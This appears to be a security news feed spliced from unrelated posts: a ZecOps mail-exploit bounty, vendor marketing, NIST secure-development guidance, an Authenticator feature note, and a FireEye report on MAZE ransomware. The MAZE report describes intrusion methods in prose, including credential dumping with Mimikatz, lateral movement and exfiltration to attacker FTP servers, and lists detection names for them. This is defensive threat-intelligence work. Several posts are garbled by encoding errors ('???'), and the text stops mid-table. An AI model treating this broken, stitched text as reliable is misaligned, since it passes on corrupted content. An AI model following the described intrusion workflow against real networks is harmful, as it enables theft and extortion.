  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address maildemon@zecops.org– there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for exploit primitive as described above.

We will determine what were the first two valid submissions according to the date they were received in our email server and if they contain an exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino. 

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: Not every email that causes the symptoms above and shared with us will qualify for a bounty as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.

How to send the emails using Outlook :

  1. Open Outlook from a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. And send the source to maildemon@zecops.org

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “… “ in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to maildemon@zecops.org

* Please note that we haven’t published all details intentionally. This bug is still unpatched and we want to avoid further misuse of this bug

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Mirror Mirror On The Wall, Is My Cloud The Most Secure?

What is the value of your cloud security investment?

How does your cloud security measure up with industry peers?

Amongst all the cloud security measures available, where should you get started?

Do you think nothing short of a magic will help answer these questions? If you answered YES! to any of the above questions, read on.

Cloud Adoption is Mainstream!

Cloud computing has evolved from being a market disruptor to the expected approach for IT. Today, businesses are evolving from being “cloud-first” to “cloud-only” According to the McAfee Cloud Adoption and Risk Report 2019, 87% enterprises said they experienced benefits from the cloud that helped drive business acceleration.

Need for Cloud Security Solutions is Paramount!

With businesses moving more sensitive data into the cloud, the need for cloud security solutions is paramount. Consider this – the average cost of a data breach for the US is $8.19 million1! The cost of loss of reputation, non-compliance or credibility is immense. Businesses recognize this truth and the need for cloud security as part of their cloud adoption journey.  As organizations adopt new infrastructure and software, cloud security spending is continuing to increase. By 2023, spending on global cloud security solutions is expected to reach $12.7 billion, according to the Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023 (Global) report.2

So, does IT really need a magical mirror to help answer foundational questions like measuring the value of their cloud security spending?

McAfee MVISION Cloud has the Answer!

McAfee MVISION Cloud, a leading Cloud Access Security Broker that provides comprehensive visibility and control across enterprise SaaS, PaaS, and Infrastructure as a Service environments, and the MVISION Cloud Security Advisor (CSA) might just have the answer!

Join us for a live webinar with Kima Hayuk, Senior IP Protection Manager for Electronic Arts and Thyaga Vasudevan, Head of Product, MVISION Cloud, McAfee.

When: May 14th, 10AM PST | 10 AM SGT | 1:00PM BST

Where: Register here Mirror Mirror On The Wall, Is My Cloud The Most Secure?

What:

  1. Learn about Electronic Arts’ cloud journey and how McAfee MVISION Cloud helps address their complex cloud security requirements
  2. Introducing MVISION CSA and how it works:
    • CSA as a tool to measure your cloud security maturity and risk posture
    • CSA as a tool to measure the value generated by your cloud investment
    • CSA as a tool to measure your cloud security posture vs. industry peers
    • CSA as a tool to get a list of unique and actionable recommendations to guide on your cloud journey.

Join Us to learn more about what customers and analysts are calling a game changer!

 

1 https://www.ibm.com/security/data-breach

2Forrester Analytics: Cloud Security Solutions Forecast, 2018 To 2023(Global) report, 1 April 2019, Jennifer Adams, Andras Cser and Sanjeev Kumar

 

The post Mirror Mirror On The Wall, Is My Cloud The Most Secure? appeared first on McAfee Blogs.

Great Minds Think Alike: Aligning Security With Business Priorities

Do you ever feel like security and risk professionals have a completely different set of priorities than the rest of the business? Well that???s because, at most companies, they do. Security professionals are concerned with securing things ??? like servers, networks, and applications ??? from cyber risks.ツ? Business decision-makers are concerned with the customer experience, growing revenue, and innovation.

Forrester addresses this discrepancy in a recent report, citing that, ???Only 16 percent of global security decision makers at enterprises claim that they are identifying new sources of data-driven revenue, and just 14 percent are developing secure customer-facing mobile and web applications.???[1]

The difference in priorities can have a negative impact on a business. For example, by concentrating solely on the security of products and services, security professionals fail to protect against new attacks that focus on how to manipulate decisions made by or about your company or the perception of your products and services. These types of attacks are commonly associated with innovation, so businesses are often fearful that innovative software will expose the company to risk. But innovation is the only way for a company to progress and stay relevant. So, it???s kind of a catch-22.

How can you solve this dilemma? You need security to align with the business priorities, which means security has to concentrate on the customer experience. Just as development is creating minimum viable products, security must match it with minimum viable security. If security and development are aligned, it will open the door to innovation, making security a competitive advantage.

To learn more about this concept, including ways to shift the security mindset, watch the following video featuring Amy DeMartine based on a recent Forrester report she co-authored, Secure What You Sell: CISOs Must Tackle Product Security to Protect Customers.

ツ?

[1] Secure What You Sell: CISOs Must Tackle Product Security To Protect Customers,??? by Jeff Pollard, Amy DeMartine with Laura Koetzle, Elsa Pikulik, Peggy Dostie, Forrester Research, Inc.

NIST Introduces Framework for Secure Software Development

NIST Cybersecurity recently published a whitepaper outlining software development practices, known collectively as a secure software development framework (SSDF), that can be implemented into the software development lifecycle (SDLC) to better secure applications. The outlined practices are based on pre-established standards and guidelines as well as software development practice documents.

NIST Cybersecurity states that, if properly implemented, the SSDF practices should, ???help software producers reduce the number of vulnerabilities in released software, mitigate the potential impact of the exploitation of undetected or unaddressed vulnerabilities, and address the root causes of vulnerabilities to prevent future recurrences.???

Some of the key tasks outlined in the framework include:

Provide secure code training

Most developers aren???t formally trained in writing secure code. If you take the time to train developers, and any other individuals with responsibilities that contribute to secure development, they???ll be able to write secure code from the start. If code is secure from the start of the development phase, it eliminates rework and speeds the time to deployment.

To ensure successful training on secure code practices, tailor the training to specific roles, document the desired outcomes, and review the training plans periodically.

Automate and integrate security tests

By leveraging automatic testing methods instead of using a manual process, you can improve consistency, accuracy, and comprehensiveness. For human-readable code, like source code, NIST Cybersecurity recommends using a ???static analysis tool to automatically check code for vulnerabilities and for compliance with the organization???s secure coding standards.??? The static analysis tool should be used to, ???remediate documented and verified unsafe software practices on a continuous basis as human-readable code is checked into the code repository.???

For executable code ??? binaries, directly executed bytecode, and directly executed source code ??? NIST Cybersecurity recommends integrating ???dynamic vulnerability testing into the project???s automated test suite.??? And, if resources are available, ???incorporate penetration testing to simulate how an attacker might attempt to compromise the software in high-risk scenarios.???

Once you???ve selected your application security tests, they should be integrated into the developers existing workflows and processes. NIST suggests ???configuring the toolchain to perform automated code analysis and testing on a regular basis.??? And, since the tests will produce a long list of vulnerabilities and flaws, you need to put a process in place to assess, prioritize, and remediate the flaws. The longer you wait to remediate flaws, the longer cyberattackers have to exploit the application.

Use open source code securely

Open source code, and all other third-party code, is still susceptible to vulnerabilities and flaws. Start by seeing if there are any publicly known flaws in the software modules that the vendor failed to fix. Then check to see if the module is being actively maintained for new vulnerabilities. If it isn???t being actively maintained, determine a plan of action for how you are going to test the code, and ???use the results from commercial services for vetting the modules and services.???

ツ?

To learn more, download the NIST Cybersecurity whitepaper, Mitigating the Risk of Software Vulnerabilities by Adopting a Secure Software Development Framework (SSDF). Or, to find out how Veracode can help you address the practices identified in the whitepaper, visit our product page.

Evaluating and Selecting AppSec Vendors to Fit Your Business Needs

Application security (AppSec) has seen quite an uptick over the last 10 years, with no signs of slowing down. When your organization is ready to tackle the challenge of building a strong AppSec program, you may find yourself wondering where to plug in various tools and solutions ??? and even where to start with comparing AppSec vendors.

How can you properly evaluate the marketplace and select the right solutions for your organization???s needs? Consider a framework that combines developer enablement with AppSec governance for an approach that covers the needs of modern software development without breaking the bank. Here???s a guide on what to look for when assessing potential vendors to determine whether they???re the right fit for your business.

Range of scanning and testing technologies

Overcoming challenges in DevSecOps means the ability to scale up and scale down as needed. It also entails empowering developers to fix security issues on their own and easing efficiency with automated solutions.

As no one single tool can act as a window into the health of your AppSec, it???s important to choose a vendor that offers several scanning and testing technologies with the ability to scale and automate from anywhere to bolster dispersed workforces. At the heart of developer enablement and AppSec should live comprehensive analysis tools with solutions like the following:

  • Static Analysis (SAST):ツ?This test process is performed without executing the program, but rather by examining the source code, byte code or application binaries for signs of security vulnerabilities.
  • Software Composition Analysis (SCA): This testing type identifies vulnerabilities in open source libraries that your team has included in the code.
  • Interactive Application Security Testing (IAST): IAST uses an agent inside the application or runtime environment that observes where an application could be exploited when executed.
  • Dynamic Analysis (DAST): Dynamic application security testing (DAST) looks at the application from the outside in ??? by examining it in its running state and trying to manipulate it in order to discover security vulnerabilities. The dynamic test simulates attacks against a web application and analyzes the application???s reactions, determining whether it is vulnerable.
  • Penetration Testing:ツ?A solution that goes beyond automated testing for a manual assessment of the health of your code

Note: Run an evaluation of the tools with your own applications, not standardized benchmark applications. Some vendors optimize results for benchmarking applications but deliver far worse results or require extensive tuning for custom apps. Insist that you will scan your own apps and want to be present for any tuning that needs to occur so that you can estimate the effort per application.

SaaS vs. on-prem solutions

When surveying options for vendors, it???s important to decide whether cloud-based SaaS solutions or on-premises tools are the better fit. On-prem tools that require installation, setup time, training, and maintenance are typically not easy to scale and are more expensive, requiring a surplus of skills and time. That means organizations are slower to start scanning and securing their applications.

Cloud-based services, however, do not require businesses to buy tools and go through the process of installation and continued maintenance or patching. There is also less of a responsibility for the accuracy of detection as that falls on the vendor and little to no downtime in running scans and receiving results that guide DevSecOps programs. When a vendor offers SaaS solutions in the cloud, they handle the deployment and upkeep swiftly so that organizations can start scanning from day one and don???t have to worry about AppSec tools weighing on their processes (or servers) as they scale up and scale down.

AppSec governance solutions

Three of the key factors for AppSec governance include defining your program to achieve specific goals, scaling your program through best practices learned along the way, and proving the value of your AppSec solution. Good AppSec governance tools directly impact remediation management by informing decisions your security and development teams make, while also helping your organization meet compliance needs. Vendors that are thoughtful about AppSec governance offer solutions including:

  • Policy and Reporting:ツ?Your AppSec vendor should have policy and reporting tools that provide a clear report on progress to help set goals, define SLAs, and meet compliance requirements.
  • Remediation Management:ツ?Remediation management solutions enable your organization to fix found flaws quickly.
  • Analytics:ツ?It???s important for your AppSec vendor of choice to offer analytics tools that provide clear insight into metrics to help you manage and mature your DevSecOps programs, as well as demonstrate success.

Developer enablement resources

Developer enablement is critical to the success of your DevSecOps program, as developers are the ones creating secure code. Resources designed for enablement will help developers find and fix flaws faster, as well as reduce the introduction of new flaws. If your vendor of choice offers these resources to developers, you???ll have an easier time opening a door of communication between development and security to shift AppSec left earlier in the development process. Focus on vendors that offer:

  • Integrations: Ask potential vendors how they would handle integrations with your development pipeline, and what their range of compatible integrations looks like.
  • Training:ツ?Vendors that offer developer training through real-time feedback while coding, workshops, and hands-on learning care about empowering your developers to write more secure code. Ask potential vendors what they offer for training materials, including programs that provide real-world experience breaking and fixing applications.
  • Remediation Guidance:ツ?Remediation guidance is an essential part of developer enablement and ongoing training. Ask potential vendors what they offer for in-context guidance and one-on-one expert advice when it comes to your specific application types, and the programming languages your developers use most.

The numbers

Have a discussion with potential vendors about numbers that can shed light on their business wellbeing and, ultimately, the impact it will have on your organization???s investment. To understand whether a potential vendor has the fortitude to meet your business needs, ask the following questions:

  • How financially stable is this vendor?
  • Will the vendor exist in the market in five to 10 years?
  • What is the vendor???s market share?

You can get a pulse on a potential vendor???s standing in the market by looking at its:

  • Revenue numbers
  • Number of customers
  • Number of scans completed
  • Reputation among its audience
  • History and track record of success
  • Innovation and breadth of offerings

Finally, take a look at how much money potential vendors charge???and how much they???ll cost you in the long run:

  • What is the price per unit (tool, scan, etc.)?
  • Carefully compare SaaS vs. on-prem solutions ??? the operational costs of on-prem solutions can be significant and should be scoped out before signing the paperwork.
  • Can you consolidate various scan types into one vendor to reduce effort and get package deals?
  • Does the solution require tuning of applications, maintenance, and operations? What is the labor cost associated with this?

Finding a vendor that fits the bill

Be prepared to approach each of your top options for vendors with questions about their suite of solutions and how they can fit into your existing processes. Look for vendors that offer multiple testing types like SAST, DAST, and SCA for a well-rounded approach to your application security.

Equally as important is finding a vendor with SaaS-based solutions in the cloud so that you won???t have to delay projects or spend time waiting for maintenance down the road. If you can find all the above in a price range that fits your budget, you???ll be well on your way to more secure applications that keep you - and your customers - safe.ツ?

Learn more about AppSec best practices, and how to get started, in our new guide, AppSec Best Practices vs. Practicality.

Early access to superannuation paused as police freeze $120,000 in allegedly stolen funds

‘Sophisticated’ identity theft attack leads to Australian Tax Office stopping early super withdrawals until Monday

Allegations of identity theft involving 150 Australians have forced the government to pause the early release of superannuation, after police froze $120,000 believed to have been ripped off from retirement savings.

On Friday the assistant treasurer, Michael Sukkar, announced the Australian Tax Office would pause requests for early access of superannuation until Monday “out of an abundance of caution” to consider further anti-fraud protection.

Related: Under-40s twice as likely to access their super early under coronavirus scheme, survey finds

Related: Should I access my super early during the coronavirus? Here's how it will impact your money

Continue reading...

Introducing portability of Google Authenticator 2SV codes across Android devices


Today is World Password Day, and we found it fitting to release an update that'll make it even easier for users to manage Google Authenticator 2-Step Verification (2SV) codes across multiple devices. We are introducing one of the most anticipated features - allowing users to transfer their 2SV secrets, the data used to generate 2SV codes across devices that have Google Authenticator installed. For instance, when upgrading from an old phone to a new phone. This feature has started rolling out and is available in the latest version (5.10) of Google Authenticator on Android.



Transferring accounts from one device to another with Google Authenticator

Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode.

Google Authenticator makes it easy to use 2SV on accounts. In addition to supplying only a password when logging in, a user also enters a code generated by the Google Authenticator app on their phone. This is a safer alternative, used by millions of users, compared to passcodes via text message.

Users place their trust in Google Authenticator to keep their accounts safe. As a result, security is always a high priority. We made several explicit design decisions to minimize the attack surface while increasing the overall usability of the app. 
  • We ensured that no data is sent to Google’s servers during the transfer -- communication is directly between your two devices. Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it.
  • We implemented a variety of alerting mechanisms and in-app logs to make sure users are aware when the transfer function has been used.

You can find more information about the Google Authenticator and its usage guide here.

Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

Victimology

We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government has been impacted demonstrating that indiscriminate nature of these operations (Figure 1).


Figure 1: Geographical and industry distribution of alleged MAZE victims

Multiple Actors Involved in MAZE Ransomware Operations Identified

Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers will partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of which who appear to work on a percentage-basis. Notably, in some cases, actors may be hired on a salary basis (vs commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


Figure 2: MAZE ransomware panel

MAZE Initially Distributed via Exploit Kits and Spam Campaigns

MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


Figure 3: German-language lure

On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United states. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


Figure 4: AT&T email lure


Figure 5: Canada Post email lure

Shift to Post-Compromise Distribution Maximizes Impact

Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur due to the fact that numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise to encryption has also been widely varied, from weeks to many months.

Initial Compromise

There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

  • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
  • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
  • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
  • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

Establish Foothold & Maintain Presence

The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

  • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
  • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
  • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
  • An actor created a new domain account and added it to the domain administrators group.

Escalate Privileges

Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

  • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
  • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
  • The actor attempted to identify hosts running the KeePass password safe software.
  • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
  • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

Reconnaissance

Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents maybe best highlights the divergent ways in which the responsible actors interact with victim networks.

  • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
  • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
  • Preliminary network reconnaissance has been conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
  • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
  • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
  • An actor employed the adfind tool and a batch script to collect information about their network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
  • An actor used the tool smbtools.exe to assess whether accounts could login to systems across the environment.
  • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

Lateral Movement

Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

  • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate rdp sessions to enable both lateral movement and privilege escalation.
  • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
  • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
  • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

Complete Mission

There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various way (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

  • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
  • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
  • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
  • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
  • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

  • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
  • Attackers employed batch scripts and a series to txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
  • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
  • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
    • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
    • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment
    • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

Implications

Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

Mandiant Security Validation Actions

Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

  • A100-877 - Active Directory - BloodHound, CollectionMethod All
  • A150-006 - Command and Control - BEACON, Check-in
  • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
  • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
  • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
  • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
  • A100-887 - Command and Control - MAZE, DNS Query #1
  • A100-888 - Command and Control - MAZE, DNS Query #2
  • A100-889 - Command and Control - MAZE, DNS Query #3
  • A100-890 -  Command and Control - MAZE, DNS Query #4
  • A100-891 - Command and Control - MAZE, DNS Query #5
  • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
  • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
  • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
  • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
  • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
  • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
  • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
  • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
  • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
  • A104-052 - Host CLI - Credential Access: Mimikatz
  • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
  • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
  • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
  • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
  • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
  • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
  • A104-493 - Host CLI - Discovery: Enumerate Network Shares
  • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
  • A104-482 - Host CLI - Discovery: Language Query Using reg query
  • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
  • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
  • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
  • A104-027 - Host CLI - Discovery: Process Discovery
  • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
  • A104-029 - Host CLI - Discovery: Remote System Discovery
  • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
  • A104-083 - Host CLI - Discovery: System Info
  • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
  • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
  • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
  • A100-879 - Malicious File Transfer - Adfind.exe, Download
  • A150-046 - Malicious File Transfer - BEACON, Download
  • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
  • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
  • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
  • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
  • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
  • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
  • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
  • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
  • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
  • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
  • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
  • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
  • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
  • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
  • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
  • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
  • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
  • A100-886 - Malicious File Transfer - Rclone.exe, Download
  • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

Detecting the Techniques

Platform

Signature Name

MVX (covers multiple FireEye technologies)

Bale Detection

FE_Ransomware_Win_MAZE_1

Endpoint Security

